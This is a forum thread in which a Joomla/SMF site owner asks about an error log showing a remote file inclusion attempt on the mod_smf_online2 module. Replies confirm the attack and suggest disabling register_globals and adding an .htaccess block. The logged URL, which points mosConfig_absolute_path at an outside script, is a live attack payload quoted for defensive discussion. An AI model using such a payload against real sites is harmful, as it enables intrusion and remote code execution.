I've found this in my error log:
Quote
http://www.MYSITE.com/index.php?option=com_smf&Itemid=91&option=com_smf&Itemid=1&mosConfig_absolute_path=http://www.whitsundaychamber.com/id.txt??
8: Undefined variable: mosConfig_db
File: .../modules/mod_smf_online2.php
Line: 281
http://www.MYSITE.com/index.php?option=com_smf&Itemid=91&option=com_smf&Itemid=1&mosConfig_absolute_path=http://www.whitsundaychamber.com/id.txt??
8: Undefined variable: moduleclass_sfx
File: .../modules/mod_smf_online2.php
Line: 279
I think it's a code injection attempt using smf-joomla who's online module, am I right? Is there any risk using this module?
I'm using Joomla 1.0.12 with SMF 1.1.4 and bridge 1.1.7
you are correct... he is TRYING to hack.
What version of smf_online2 do you have?
These are the first lines of my module:
// $Id: mod_smf_online2.php,v 1.8 2006.04.10 Kindred
/**
* @Who is online
* @package smf
* @Copyright (C) 2005 [email protected]
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.8 $
*/Thanks for the quick reply ;).
you should be fine then...
that version is not affected by the vairant hack that the person attempted.
make sure that you have REGISTER GLOBALS turned off, BOTH at the PHP level, AND in Joomla, which may turn it on internally otherwise it will work.
Also: you can put a line in your .HTACCESS file to redirect any request that has "http" or attempts to set mosConfig in a url..